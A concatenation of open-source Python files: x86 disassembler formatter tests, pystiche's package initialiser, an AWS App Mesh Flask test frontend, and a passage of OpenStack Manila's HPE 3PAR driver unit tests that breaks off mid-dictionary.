assert formatter.space_after_operand_separator
assert formatter.space_after_memory_bracket
assert formatter.space_between_memory_add_operators
assert formatter.space_between_memory_mul_operators
assert formatter.scale_before_index
assert formatter.always_show_scale
assert formatter.always_show_segment_register
assert formatter.show_zero_displacements
assert formatter.hex_prefix == "0X"
assert formatter.hex_suffix == "H"
assert formatter.hex_digit_group_size == 5
assert formatter.decimal_prefix == "0D"
assert formatter.decimal_suffix == "D"
assert formatter.decimal_digit_group_size == 6
assert formatter.octal_prefix == "0O"
assert formatter.octal_suffix == "O"
assert formatter.octal_digit_group_size == 7
assert formatter.binary_prefix == "0B"
assert formatter.binary_suffix == "B"
assert formatter.binary_digit_group_size == 8
assert formatter.digit_separator == "`"
assert formatter.leading_zeros
assert not formatter.uppercase_hex
assert not formatter.small_hex_numbers_in_decimal
assert not formatter.add_leading_zero_to_hex_numbers
assert formatter.number_base == 8
assert not formatter.branch_leading_zeros
assert formatter.signed_immediate_operands
assert not formatter.signed_memory_displacements
assert formatter.displacement_leading_zeros
assert formatter.memory_size_options == MemorySizeOptions.NEVER
assert formatter.rip_relative_addresses
assert not formatter.show_branch_size
assert not formatter.use_pseudo_ops
assert formatter.show_symbol_address
assert formatter.gas_naked_registers
assert formatter.gas_show_mnemonic_size_suffix
assert formatter.gas_space_after_memory_operand_comma
assert not formatter.masm_add_ds_prefix32
assert not formatter.masm_symbol_displ_in_brackets
assert not formatter.masm_displ_in_brackets
assert formatter.nasm_show_sign_extended_immediate_size
assert formatter.prefer_st0
assert formatter.show_useless_prefixes
assert formatter.cc_b == CC_b.C
assert formatter.cc_ae == CC_ae.NB
assert formatter.cc_e == CC_e.Z
assert formatter.cc_ne == CC_ne.NZ
assert formatter.cc_be == CC_be.NA
assert formatter.cc_a == CC_a.NBE
assert formatter.cc_p == CC_p.PE
assert formatter.cc_np == CC_np.PO
assert formatter.cc_l == CC_l.NGE
assert formatter.cc_ge == CC_ge.NL
assert formatter.cc_le == CC_le.NG
assert formatter.cc_g == CC_g.NLE
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_memory_size_options_arg(syntax: FormatterSyntax_) -> None:
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.memory_size_options = 123 # type: ignore
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_cc_b_arg(syntax: FormatterSyntax_) -> None:
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.cc_b = 123 # type: ignore
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_cc_ae_arg(syntax: FormatterSyntax_) -> None:
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.cc_ae = 123 # type: ignore
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_cc_e_arg(syntax: FormatterSyntax_) -> None:
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.cc_e = 123 # type: ignore
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_cc_ne_arg(syntax: FormatterSyntax_) -> None:
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.cc_ne = 123 # type: ignore
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_cc_be_arg(syntax: FormatterSyntax_) -> None:
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.cc_be = 123 # type: ignore
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_cc_a_arg(syntax: FormatterSyntax_) -> None:
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.cc_a = 123 # type: ignore
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_cc_p_arg(syntax: FormatterSyntax_) -> None:
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.cc_p = 123 # type: ignore
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_cc_np_arg(syntax: FormatterSyntax_) -> None:
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.cc_np = 123 # type: ignore
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_cc_l_arg(syntax: FormatterSyntax_) -> None:
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.cc_l = 123 # type: ignore
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_cc_ge_arg(syntax: FormatterSyntax_) -> None:
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.cc_ge = 123 # type: ignore
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_cc_le_arg(syntax: FormatterSyntax_) -> None:
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.cc_le = 123 # type: ignore
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_cc_g_arg(syntax: FormatterSyntax_) -> None:
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.cc_g = 123 # type: ignore
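
# For contrast with the failure cases above, the typical happy path (a sketch;
# the bytes are the same EVEX-encoded instruction used throughout this file):
#     instr = Decoder(64, b"\x62\xF2\x4F\xDD\x72\x50\x01").decode()
#     formatter = Formatter(FormatterSyntax.NASM)
#     text = formatter.format(instr)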


# ===========================================================================
# File: /pystiche/__init__.py
# Repo: pystiche/pystiche (BSD-3-Clause)
# ===========================================================================
try:
from ._version import version as __version__ # type: ignore[import]
except ImportError:
__version__ = "UNKNOWN"
from .core import *
from . import loss, enc, demo, data, image, pyramid, optim
import os
os.makedirs(home(), exist_ok=True)
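
# Note: home() is presumably exported by the star import from .core above;
# creating the cache directory at import time lets downstream code assume
# that it already exists.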


# ===========================================================================
# File: /test/integration/test_app/frontend/app.py
# Repo: aws/aws-app-mesh-controller-for-k8s (Apache-2.0)
# ===========================================================================
import os
import requests
import config
from flask import Flask, request
from aws_xray_sdk.core import xray_recorder, patch_all
from aws_xray_sdk.ext.flask.middleware import XRayMiddleware
app = Flask(__name__)
xray_recorder.configure(
context_missing='LOG_ERROR',
service=config.XRAY_APP_NAME,
)
patch_all()
XRayMiddleware(app, xray_recorder)
@app.route('/defaultroute')
def default():
print(request.headers)
backend_url = 'http://' + config.BACKEND_TIMEOUT_HOST + ':' + str(config.PORT) + '/defaultroute'
response = requests.get(backend_url)
return response.text
@app.route('/timeoutroute')
def timeout():
print(request.headers)
backend_url = 'http://' + config.BACKEND_TIMEOUT_HOST + ':' + str(config.PORT) + '/timeoutroute'
response = requests.get(backend_url)
return response.text
@app.route('/tlsroute')
def tlsroute():
print(request.headers)
backend_url = 'http://' + config.BACKEND_TLS_HOST + ':' + str(config.PORT) + '/tlsroute'
response = requests.get(backend_url)
return response.text
if __name__ == '__main__':
app.run(host='0.0.0.0', port=config.PORT, debug=config.DEBUG_MODE)
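
# Quick manual check once the app is running (assuming config.PORT == 8080):
#     curl http://localhost:8080/defaultroute
# Each handler forwards the request to its configured backend host and
# relays the backend's response body verbatim.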


# ===========================================================================
# File: /manila/tests/share/drivers/hpe/test_hpe_3par_driver.py
# Repo: openstack/manila (Apache-2.0)
# ===========================================================================
# Copyright 2015 Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from copy import deepcopy
import sys
from unittest import mock
import ddt
if 'hpe3parclient' not in sys.modules:
sys.modules['hpe3parclient'] = mock.Mock()
from manila import exception
from manila.share.drivers.hpe import hpe_3par_driver as hpe3pardriver
from manila.share.drivers.hpe import hpe_3par_mediator as hpe3parmediator
from manila import test
from manila.tests.share.drivers.hpe import test_hpe_3par_constants as constants
@ddt.ddt
class HPE3ParDriverFPGTestCase(test.TestCase):
@ddt.data((-1, 4),
(0, 5),
(0, -1))
@ddt.unpack
def test_FPG_init_args_failure(self, min_ip, max_ip):
self.assertRaises(exception.HPE3ParInvalid,
hpe3pardriver.FPG, min_ip, max_ip)
@ddt.data(('invalid_ip_fpg, 10.256.0.1', 0, 4),
(None, 0, 4),
(' ', 0, 4),
('', 0, 4),
('max_ip_fpg, 10.0.0.1, 10.0.0.2, 10.0.0.3, 10.0.0.4, 10.0.0.5',
0, 4),
('min_1_ip_fpg', 1, 4))
@ddt.unpack
def test_FPG_type_failures(self, value, min_ip, max_ip):
fpg_type_obj = hpe3pardriver.FPG(min_ip=min_ip, max_ip=max_ip)
self.assertRaises(exception.HPE3ParInvalid, fpg_type_obj, value)
@ddt.data(('samplefpg, 10.0.0.1', {'samplefpg': ['10.0.0.1']}),
('samplefpg', {'samplefpg': []}),
('samplefpg, 10.0.0.1, 10.0.0.2',
{'samplefpg': ['10.0.0.1', '10.0.0.2']}))
@ddt.unpack
def test_FPG_type_success(self, value, expected_fpg):
fpg_type_obj = hpe3pardriver.FPG()
fpg = fpg_type_obj(value)
self.assertEqual(expected_fpg, fpg)
@ddt.ddt
class HPE3ParDriverTestCase(test.TestCase):
def setUp(self):
super(HPE3ParDriverTestCase, self).setUp()
# Create a mock configuration with attributes and a safe_get()
self.conf = mock.Mock()
self.conf.driver_handles_share_servers = True
self.conf.hpe3par_debug = constants.EXPECTED_HPE_DEBUG
self.conf.hpe3par_username = constants.USERNAME
self.conf.hpe3par_password = constants.PASSWORD
self.conf.hpe3par_api_url = constants.API_URL
self.conf.hpe3par_san_login = constants.SAN_LOGIN
self.conf.hpe3par_san_password = constants.SAN_PASSWORD
self.conf.hpe3par_san_ip = constants.EXPECTED_IP_1234
self.conf.hpe3par_fpg = constants.EXPECTED_FPG_CONF
self.conf.hpe3par_san_ssh_port = constants.PORT
self.conf.ssh_conn_timeout = constants.TIMEOUT
self.conf.hpe3par_fstore_per_share = False
self.conf.hpe3par_require_cifs_ip = False
        self.conf.hpe3par_cifs_admin_access_username = constants.USERNAME
        self.conf.hpe3par_cifs_admin_access_password = constants.PASSWORD
        self.conf.hpe3par_cifs_admin_access_domain = (
            constants.EXPECTED_CIFS_DOMAIN)
        self.conf.hpe3par_share_mount_path = constants.EXPECTED_MOUNT_PATH
self.conf.my_ip = constants.EXPECTED_IP_1234
self.conf.network_config_group = 'test_network_config_group'
self.conf.admin_network_config_group = (
'test_admin_network_config_group')
self.conf.filter_function = None
self.conf.goodness_function = None
def safe_get(attr):
try:
return self.conf.__getattribute__(attr)
except AttributeError:
return None
self.conf.safe_get = safe_get
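        # safe_get mirrors oslo.config behaviour: unknown options resolve to
        # None instead of raising AttributeError, which is what the driver's
        # configuration access expects.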
self.real_hpe_3par_mediator = hpe3parmediator.HPE3ParMediator
self.mock_object(hpe3parmediator, 'HPE3ParMediator')
self.mock_mediator_constructor = hpe3parmediator.HPE3ParMediator
self.mock_mediator = self.mock_mediator_constructor()
# restore needed static methods
self.mock_mediator.ensure_supported_protocol = (
self.real_hpe_3par_mediator.ensure_supported_protocol)
self.mock_mediator.build_export_locations = (
self.real_hpe_3par_mediator.build_export_locations)
self.driver = hpe3pardriver.HPE3ParShareDriver(
configuration=self.conf)
def test_driver_setup_success(self,
get_vfs_ret_val=constants.EXPECTED_GET_VFS):
"""Driver do_setup without any errors."""
self.mock_mediator.get_vfs.return_value = get_vfs_ret_val
self.driver.do_setup(None)
conf = self.conf
self.mock_mediator_constructor.assert_has_calls([
mock.call(hpe3par_san_ssh_port=conf.hpe3par_san_ssh_port,
hpe3par_san_password=conf.hpe3par_san_password,
hpe3par_username=conf.hpe3par_username,
hpe3par_san_login=conf.hpe3par_san_login,
hpe3par_debug=conf.hpe3par_debug,
hpe3par_api_url=conf.hpe3par_api_url,
hpe3par_password=conf.hpe3par_password,
hpe3par_san_ip=conf.hpe3par_san_ip,
hpe3par_fstore_per_share=conf.hpe3par_fstore_per_share,
hpe3par_require_cifs_ip=conf.hpe3par_require_cifs_ip,
hpe3par_cifs_admin_access_username=(
conf.hpe3par_cifs_admin_access_username),
hpe3par_cifs_admin_access_password=(
conf.hpe3par_cifs_admin_access_password),
hpe3par_cifs_admin_access_domain=(
conf.hpe3par_cifs_admin_access_domain),
hpe3par_share_mount_path=conf.hpe3par_share_mount_path,
my_ip=self.conf.my_ip,
ssh_conn_timeout=conf.ssh_conn_timeout)])
self.mock_mediator.assert_has_calls([
mock.call.do_setup(),
mock.call.get_vfs(constants.EXPECTED_FPG)])
def test_driver_setup_dhss_success(self):
"""Driver do_setup without any errors with dhss=True."""
self.test_driver_setup_success()
self.assertEqual(constants.EXPECTED_FPG_MAP, self.driver.fpgs)
def test_driver_setup_no_dhss_success(self):
"""Driver do_setup without any errors with dhss=False."""
self.conf.driver_handles_share_servers = False
self.test_driver_setup_success()
self.assertEqual(constants.EXPECTED_FPG_MAP, self.driver.fpgs)
def test_driver_setup_no_dhss_multi_getvfs_success(self):
"""Driver do_setup when dhss=False, getvfs returns multiple IPs."""
self.conf.driver_handles_share_servers = False
self.test_driver_setup_success(
get_vfs_ret_val=constants.EXPECTED_GET_VFS_MULTIPLES)
self.assertEqual(constants.EXPECTED_FPG_MAP,
self.driver.fpgs)
def test_driver_setup_success_no_dhss_no_conf_ss_ip(self):
"""test driver's do_setup()
Driver do_setup with dhss=False, share server ip not set in config file
but discoverable at 3par array
"""
self.conf.driver_handles_share_servers = False
# ss ip not provided in conf
original_fpg = deepcopy(self.conf.hpe3par_fpg)
self.conf.hpe3par_fpg[0][constants.EXPECTED_FPG] = []
self.test_driver_setup_success()
self.assertEqual(constants.EXPECTED_FPG_MAP, self.driver.fpgs)
constants.EXPECTED_FPG_CONF = original_fpg
def test_driver_setup_failure_no_dhss_no_conf_ss_ip(self):
"""Configured IP address is required for dhss=False."""
self.conf.driver_handles_share_servers = False
# ss ip not provided in conf
        original_fpg = deepcopy(self.conf.hpe3par_fpg)  # snapshot before the IPs are cleared
self.conf.hpe3par_fpg[0][constants.EXPECTED_FPG] = []
# ss ip not configured on array
vfs_without_ss_ip = deepcopy(constants.EXPECTED_GET_VFS)
vfs_without_ss_ip['vfsip']['address'] = []
self.mock_mediator.get_vfs.return_value = vfs_without_ss_ip
self.assertRaises(exception.HPE3ParInvalid,
self.driver.do_setup, None)
        constants.EXPECTED_FPG_CONF = original_fpg
def test_driver_setup_mediator_error(self):
"""Driver do_setup when the mediator setup fails."""
self.mock_mediator.do_setup.side_effect = (
exception.ShareBackendException('fail'))
self.assertRaises(exception.ShareBackendException,
self.driver.do_setup, None)
conf = self.conf
self.mock_mediator_constructor.assert_has_calls([
mock.call(hpe3par_san_ssh_port=conf.hpe3par_san_ssh_port,
hpe3par_san_password=conf.hpe3par_san_password,
hpe3par_username=conf.hpe3par_username,
hpe3par_san_login=conf.hpe3par_san_login,
hpe3par_debug=conf.hpe3par_debug,
hpe3par_api_url=conf.hpe3par_api_url,
hpe3par_password=conf.hpe3par_password,
hpe3par_san_ip=conf.hpe3par_san_ip,
hpe3par_fstore_per_share=conf.hpe3par_fstore_per_share,
hpe3par_require_cifs_ip=conf.hpe3par_require_cifs_ip,
hpe3par_cifs_admin_access_username=(
conf.hpe3par_cifs_admin_access_username),
hpe3par_cifs_admin_access_password=(
conf.hpe3par_cifs_admin_access_password),
hpe3par_cifs_admin_access_domain=(
conf.hpe3par_cifs_admin_access_domain),
hpe3par_share_mount_path=conf.hpe3par_share_mount_path,
my_ip=self.conf.my_ip,
ssh_conn_timeout=conf.ssh_conn_timeout)])
self.mock_mediator.assert_has_calls([mock.call.do_setup()])
def test_driver_setup_with_vfs_error(self):
"""Driver do_setup when the get_vfs fails."""
self.mock_mediator.get_vfs.side_effect = (
exception.ShareBackendException('fail'))
self.assertRaises(exception.ShareBackendException,
self.driver.do_setup, None)
conf = self.conf
self.mock_mediator_constructor.assert_has_calls([
mock.call(hpe3par_san_ssh_port=conf.hpe3par_san_ssh_port,
hpe3par_san_password=conf.hpe3par_san_password,
hpe3par_username=conf.hpe3par_username,
hpe3par_san_login=conf.hpe3par_san_login,
hpe3par_debug=conf.hpe3par_debug,
hpe3par_api_url=conf.hpe3par_api_url,
hpe3par_password=conf.hpe3par_password,
hpe3par_san_ip=conf.hpe3par_san_ip,
hpe3par_fstore_per_share=conf.hpe3par_fstore_per_share,
hpe3par_require_cifs_ip=conf.hpe3par_require_cifs_ip,
hpe3par_cifs_admin_access_username=(
conf.hpe3par_cifs_admin_access_username),
hpe3par_cifs_admin_access_password=(
conf.hpe3par_cifs_admin_access_password),
hpe3par_cifs_admin_access_domain=(
conf.hpe3par_cifs_admin_access_domain),
hpe3par_share_mount_path=conf.hpe3par_share_mount_path,
my_ip=self.conf.my_ip,
ssh_conn_timeout=conf.ssh_conn_timeout)])
self.mock_mediator.assert_has_calls([
mock.call.do_setup(),
mock.call.get_vfs(constants.EXPECTED_FPG)])
def test_driver_setup_conf_ips_validation_fails(self):
"""Driver do_setup when the _validate_pool_ips fails."""
self.conf.driver_handles_share_servers = False
vfs_with_ss_ip = deepcopy(constants.EXPECTED_GET_VFS)
vfs_with_ss_ip['vfsip']['address'] = ['10.100.100.100']
self.mock_mediator.get_vfs.return_value = vfs_with_ss_ip
self.assertRaises(exception.HPE3ParInvalid,
self.driver.do_setup, None)
conf = self.conf
self.mock_mediator_constructor.assert_has_calls([
mock.call(hpe3par_san_ssh_port=conf.hpe3par_san_ssh_port,
hpe3par_san_password=conf.hpe3par_san_password,
hpe3par_username=conf.hpe3par_username,
hpe3par_san_login=conf.hpe3par_san_login,
hpe3par_debug=conf.hpe3par_debug,
hpe3par_api_url=conf.hpe3par_api_url,
hpe3par_password=conf.hpe3par_password,
hpe3par_san_ip=conf.hpe3par_san_ip,
hpe3par_fstore_per_share=conf.hpe3par_fstore_per_share,
hpe3par_require_cifs_ip=conf.hpe3par_require_cifs_ip,
hpe3par_cifs_admin_access_username=(
conf.hpe3par_cifs_admin_access_username),
hpe3par_cifs_admin_access_password=(
conf.hpe3par_cifs_admin_access_password),
hpe3par_cifs_admin_access_domain=(
conf.hpe3par_cifs_admin_access_domain),
hpe3par_share_mount_path=conf.hpe3par_share_mount_path,
my_ip=self.conf.my_ip,
ssh_conn_timeout=conf.ssh_conn_timeout)])
self.mock_mediator.assert_has_calls([
mock.call.do_setup(),
mock.call.get_vfs(constants.EXPECTED_FPG)])
def init_driver(self):
"""Simple driver setup for re-use with tests that need one."""
self.driver._hpe3par = self.mock_mediator
self.driver.fpgs = constants.EXPECTED_FPG_MAP
self.mock_object(hpe3pardriver, 'share_types')
get_extra_specs = hpe3pardriver.share_types.get_extra_specs_from_share
get_extra_specs.return_value = constants.EXPECTED_EXTRA_SPECS
def test_driver_check_for_setup_error_success(self):
"""check_for_setup_error when things go well."""
# Generally this is always mocked, but here we reference the class.
hpe3parmediator.HPE3ParMediator = self.real_hpe_3par_mediator
self.mock_object(hpe3pardriver, 'LOG')
self.init_driver()
self.driver.check_for_setup_error()
expected_calls = [
mock.call.debug('HPE3ParShareDriver SHA1: %s', mock.ANY),
mock.call.debug('HPE3ParMediator SHA1: %s', mock.ANY)
]
hpe3pardriver.LOG.assert_has_calls(expected_calls)
def test_driver_check_for_setup_error_exception(self):
"""check_for_setup_error catch and log any exceptions."""
# Since HPE3ParMediator is mocked, we'll hit the except/log.
self.mock_object(hpe3pardriver, 'LOG')
self.init_driver()
self.driver.check_for_setup_error()
expected_calls = [
mock.call.debug('HPE3ParShareDriver SHA1: %s', mock.ANY),
mock.call.debug('Source code SHA1 not logged due to: %s', mock.ANY)
]
hpe3pardriver.LOG.assert_has_calls(expected_calls)
@ddt.data(([constants.SHARE_SERVER], constants.SHARE_SERVER),
([], None),)
@ddt.unpack
def test_choose_share_server_compatible_with_share(self, share_servers,
expected_share_sever):
context = None
share_server = self.driver.choose_share_server_compatible_with_share(
context,
share_servers,
constants.NFS_SHARE_INFO,
None,
None)
self.assertEqual(expected_share_sever, share_server)
def test_choose_share_server_compatible_with_share_with_cg(self):
context = None
cg_ref = {'id': 'dummy'}
self.assertRaises(
exception.InvalidRequest,
self.driver.choose_share_server_compatible_with_share,
context,
[constants.SHARE_SERVER],
constants.NFS_SHARE_INFO,
None,
cg_ref)
def do_create_share(self, protocol, share_type_id, expected_project_id,
expected_share_id, expected_size):
"""Re-usable code for create share."""
context = None
share = {
'display_name': constants.EXPECTED_SHARE_NAME,
'host': constants.EXPECTED_HOST,
'project_id': expected_project_id,
'id': expected_share_id,
'share_proto': protocol,
'share_type_id': share_type_id,
'size': expected_size,
}
location = self.driver.create_share(context, share,
constants.SHARE_SERVER)
return location
def do_create_share_from_snapshot(self,
protocol,
share_type_id,
snapshot_instance,
expected_share_id,
expected_size):
"""Re-usable code for create share from snapshot."""
context = None
share = {
'project_id': constants.EXPECTED_PROJECT_ID,
'display_name': constants.EXPECTED_SHARE_NAME,
'host': constants.EXPECTED_HOST,
'id': expected_share_id,
'share_proto': protocol,
'share_type_id': share_type_id,
'size': expected_size,
}
location = self.driver.create_share_from_snapshot(
context,
share,
snapshot_instance,
constants.SHARE_SERVER)
return location
@ddt.data((constants.UNEXPECTED_HOST, exception.InvalidHost),
(constants.HOST_WITHOUT_POOL_1, exception.InvalidHost),
(constants.HOST_WITHOUT_POOL_2, exception.InvalidHost))
@ddt.unpack
def test_driver_create_share_fails_get_pool_location(self, host,
expected_exception):
"""get_pool_location fails to extract pool name from host"""
self.init_driver()
context = None
share_server = None
share = {
'display_name': constants.EXPECTED_SHARE_NAME,
'host': host,
'project_id': constants.EXPECTED_PROJECT_ID,
'id': constants.EXPECTED_SHARE_ID,
'share_proto': constants.CIFS,
'share_type_id': constants.SHARE_TYPE_ID,
'size': constants.EXPECTED_SIZE_2,
}
self.assertRaises(expected_exception,
self.driver.create_share,
context, share, share_server)
def test_driver_create_cifs_share(self):
self.init_driver()
expected_location = '\\\\%s\\%s' % (constants.EXPECTED_IP_10203040,
constants.EXPECTED_SHARE_NAME)
self.mock_mediator.create_share.return_value = (
constants.EXPECTED_SHARE_NAME)
hpe3parmediator.HPE3ParMediator = self.real_hpe_3par_mediator
location = self.do_create_share(constants.CIFS,
constants.SHARE_TYPE_ID,
constants.EXPECTED_PROJECT_ID,
constants.EXPECTED_SHARE_ID,
constants.EXPECTED_SIZE_2)
self.assertIn(expected_location, location)
expected_calls = [mock.call.create_share(
constants.EXPECTED_PROJECT_ID,
constants.EXPECTED_SHARE_ID,
constants.CIFS,
constants.EXPECTED_EXTRA_SPECS,
constants.EXPECTED_FPG,
constants.EXPECTED_VFS,
comment=mock.ANY,
size=constants.EXPECTED_SIZE_2)]
self.mock_mediator.assert_has_calls(expected_calls)
def test_driver_create_nfs_share(self):
self.init_driver()
expected_location = ':'.join((constants.EXPECTED_IP_10203040,
constants.EXPECTED_SHARE_PATH))
self.mock_mediator.create_share.return_value = (
constants.EXPECTED_SHARE_PATH)
hpe3parmediator.HPE3ParMediator = self.real_hpe_3par_mediator
location = self.do_create_share(constants.NFS,
constants.SHARE_TYPE_ID,
constants.EXPECTED_PROJECT_ID,
constants.EXPECTED_SHARE_ID,
constants.EXPECTED_SIZE_1)
self.assertIn(expected_location, location)
expected_calls = [
mock.call.create_share(constants.EXPECTED_PROJECT_ID,
constants.EXPECTED_SHARE_ID,
constants.NFS,
constants.EXPECTED_EXTRA_SPECS,
constants.EXPECTED_FPG,
constants.EXPECTED_VFS,
comment=mock.ANY,
size=constants.EXPECTED_SIZE_1)]
self.mock_mediator.assert_has_calls(expected_calls)
def test_driver_create_cifs_share_from_snapshot(self):
self.init_driver()
expected_location = '\\\\%s\\%s' % (constants.EXPECTED_IP_10203040,
constants.EXPECTED_SHARE_NAME)
self.mock_mediator.create_share_from_snapshot.return_value = (
constants.EXPECTED_SHARE_NAME)
hpe3parmediator.HPE3ParMediator = self.real_hpe_3par_mediator
snapshot_instance = constants.SNAPSHOT_INSTANCE.copy()
snapshot_instance['protocol'] = constants.CIFS
location = self.do_create_share_from_snapshot(
constants.CIFS,
constants.SHARE_TYPE_ID,
snapshot_instance,
constants.EXPECTED_SHARE_ID,
constants.EXPECTED_SIZE_2)
self.assertIn(expected_location, location)
expected_calls = [
mock.call.create_share_from_snapshot(
constants.EXPECTED_SHARE_ID,
constants.CIFS,
constants.EXPECTED_EXTRA_SPECS,
constants.EXPECTED_FSTORE,
constants.EXPECTED_SHARE_ID,
constants.EXPECTED_SNAP_ID,
constants.EXPECTED_FPG,
constants.EXPECTED_VFS,
[constants.EXPECTED_IP_10203040],
comment=mock.ANY,
size=constants.EXPECTED_SIZE_2),
]
self.mock_mediator.assert_has_calls(expected_calls)
def test_driver_create_nfs_share_from_snapshot(self):
self.init_driver()
expected_location = ':'.join((constants.EXPECTED_IP_10203040,
constants.EXPECTED_SHARE_PATH))
self.mock_mediator.create_share_from_snapshot.return_value = (
constants.EXPECTED_SHARE_PATH)
hpe3parmediator.HPE3ParMediator = self.real_hpe_3par_mediator
location = self.do_create_share_from_snapshot(
constants.NFS,
constants.SHARE_TYPE_ID,
constants.SNAPSHOT_INSTANCE,
constants.EXPECTED_SHARE_ID,
constants.EXPECTED_SIZE_1)
self.assertIn(expected_location, location)
expected_calls = [
mock.call.create_share_from_snapshot(
constants.EXPECTED_SHARE_ID,
constants.NFS,
constants.EXPECTED_EXTRA_SPECS,
constants.EXPECTED_PROJECT_ID,
constants.EXPECTED_SHARE_ID,
constants.EXPECTED_SNAP_ID,
constants.EXPECTED_FPG,
constants.EXPECTED_VFS,
[constants.EXPECTED_IP_10203040],
comment=mock.ANY,
size=constants.EXPECTED_SIZE_1),
]
self.mock_mediator.assert_has_calls(expected_calls)
def test_driver_delete_share(self):
self.init_driver()
context = None
share_server = None
share = {
'project_id': constants.EXPECTED_PROJECT_ID,
'id': constants.EXPECTED_SHARE_ID,
'share_proto': constants.CIFS,
'size': constants.EXPECTED_SIZE_1,
'host': constants.EXPECTED_HOST
}
self.driver.delete_share(context, share, share_server)
expected_calls = [
mock.call.delete_share(constants.EXPECTED_PROJECT_ID,
constants.EXPECTED_SHARE_ID,
constants.EXPECTED_SIZE_1,
constants.CIFS,
constants.EXPECTED_FPG,
constants.EXPECTED_VFS,
constants.EXPECTED_IP_10203040)]
self.mock_mediator.assert_has_calls(expected_calls)
def test_driver_create_snapshot(self):
self.init_driver()
context = None
share_server = None
self.driver.create_snapshot(context,
constants.SNAPSHOT_INFO,
share_server)
expected_calls = [
mock.call.create_snapshot(constants.EXPECTED_PROJECT_ID,
constants.EXPECTED_SHARE_ID,
constants.NFS,
constants.EXPECTED_SNAP_ID,
constants.EXPECTED_FPG,
constants.EXPECTED_VFS)]
self.mock_mediator.assert_has_calls(expected_calls)
def test_driver_delete_snapshot(self):
self.init_driver()
context = None
share_server = None
self.driver.delete_snapshot(context,
constants.SNAPSHOT_INFO,
share_server)
expected_calls = [
mock.call.delete_snapshot(constants.EXPECTED_PROJECT_ID,
constants.EXPECTED_SHARE_ID,
constants.NFS,
constants.EXPECTED_SNAP_ID,
constants.EXPECTED_FPG,
constants.EXPECTED_VFS)
]
self.mock_mediator.assert_has_calls(expected_calls)
def test_driver_update_access_add_rule(self):
self.init_driver()
context = None
self.driver.update_access(context,
constants.NFS_SHARE_INFO,
[constants.ACCESS_RULE_NFS],
[constants.ADD_RULE_IP],
[],
constants.SHARE_SERVER)
expected_calls = [
mock.call.update_access(constants.EXPECTED_PROJECT_ID,
constants.EXPECTED_SHARE_ID,
constants.NFS,
constants.EXPECTED_EXTRA_SPECS,
[constants.ACCESS_RULE_NFS],
[constants.ADD_RULE_IP],
[],
constants.EXPECTED_FPG,
constants.EXPECTED_VFS)
]
self.mock_mediator.assert_has_calls(expected_calls)
def test_driver_update_access_delete_rule(self):
self.init_driver()
context = None
self.driver.update_access(context,
constants.NFS_SHARE_INFO,
[constants.ACCESS_RULE_NFS],
[],
[constants.DELETE_RULE_IP],
constants.SHARE_SERVER)
expected_calls = [
mock.call.update_access(constants.EXPECTED_PROJECT_ID,
constants.EXPECTED_SHARE_ID,
constants.NFS,
constants.EXPECTED_EXTRA_SPECS,
[constants.ACCESS_RULE_NFS],
[],
[constants.DELETE_RULE_IP],
constants.EXPECTED_FPG,
constants.EXPECTED_VFS)
]
self.mock_mediator.assert_has_calls(expected_calls)
def test_driver_extend_share(self):
self.init_driver()
old_size = constants.NFS_SHARE_INFO['size']
new_size = old_size * 2
share_server = None
self.driver.extend_share(constants.NFS_SHARE_INFO,
new_size, share_server)
self.mock_mediator.resize_share.assert_called_once_with(
constants.EXPECTED_PROJECT_ID,
constants.EXPECTED_SHARE_ID,
constants.NFS,
new_size,
old_size,
constants.EXPECTED_FPG,
constants.EXPECTED_VFS)
def test_driver_shrink_share(self):
self.init_driver()
old_size = constants.NFS_SHARE_INFO['size']
new_size = old_size / 2
share_server = None
self.driver.shrink_share(constants.NFS_SHARE_INFO,
new_size, share_server)
self.mock_mediator.resize_share.assert_called_once_with(
constants.EXPECTED_PROJECT_ID,
constants.EXPECTED_SHARE_ID,
constants.NFS,
new_size,
old_size,
constants.EXPECTED_FPG,
constants.EXPECTED_VFS)
def test_driver_get_share_stats_not_ready(self):
"""Protect against stats update before driver is ready."""
self.mock_object(hpe3pardriver, 'LOG')
expected_result = {
'driver_handles_share_servers': True,
'qos': False,
'driver_version': self.driver.VERSION,
'free_capacity_gb': 0,
'max_over_subscription_ratio': None,
'reserved_percentage': 0,
'reserved_snapshot_percentage': 0,
'reserved_share_extend_percentage': 0,
'provisioned_capacity_gb': 0,
'share_backend_name': 'HPE_3PAR',
'snapshot_support': True,
'create_share_from_snapshot_support': True,
'revert_to_snapshot_support': False,
'mount_snapshot_support': False,
'share_group_stats': {
'consistent_snapshot_support': None,
},
'storage_protocol': 'NFS_CIFS',
'thin_provisioning': True,
